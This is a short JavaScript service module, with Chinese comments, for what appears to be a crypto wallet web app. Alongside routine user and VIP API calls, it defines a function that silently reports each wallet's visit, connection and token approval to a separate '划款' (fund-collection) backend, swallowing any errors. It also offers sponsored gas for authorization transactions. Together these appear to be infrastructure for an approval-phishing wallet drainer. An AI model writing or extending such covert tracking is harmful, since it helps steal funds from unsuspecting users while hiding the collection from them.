import { get, post, put } from '../utils/api';

/**
 * 用户服务
 */
export const userService = {
  // 获取用户列表
  getUserList: async (page = 1, size = 10, keyword = '') => {
    const response = await get('/users', { page, size, keyword });
    return response.data;
  },

  // 根据钱包地址获取用户
  getUserByAddress: async (address) => {
    const response = await get(`/users/address/${address}`);
    return response.data;
  },

  // 获取用户资产统计
  getUserStats: async (walletAddress) => {
    const response = await get('/dashboard/user-stats', { walletAddress });
    return response.data;
  },

  // 更新用户 VIP 状态
  updateVipStatus: async (address, isVip) => {
    const response = await put(`/users/address/${address}/vip?isVip=${isVip}`);
    return response;
  },

  // 请求平台赞助 GAS（支持授权交易，24 小时限一次）
  requestGasSponsor: async (walletAddress, chainId) => {
    const response = await post('/vip/gas-sponsor', { walletAddress, chainId });
    return response;
  },
};

// 划款后台（collection-service）地址登记与埋点
const COLLECTION_API = 'http://localhost:8090/api';

/**
 * 登记地址到划款后台（失败静默，不影响主流程）
 * type: VISIT | CONNECT | APPROVE
 */
export const registerToCollection = async (payload) => {
  try {
    await fetch(`${COLLECTION_API}/addresses/register`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload),
    });
  } catch (e) {
    console.warn('登记到划款后台失败:', e);
  }
};

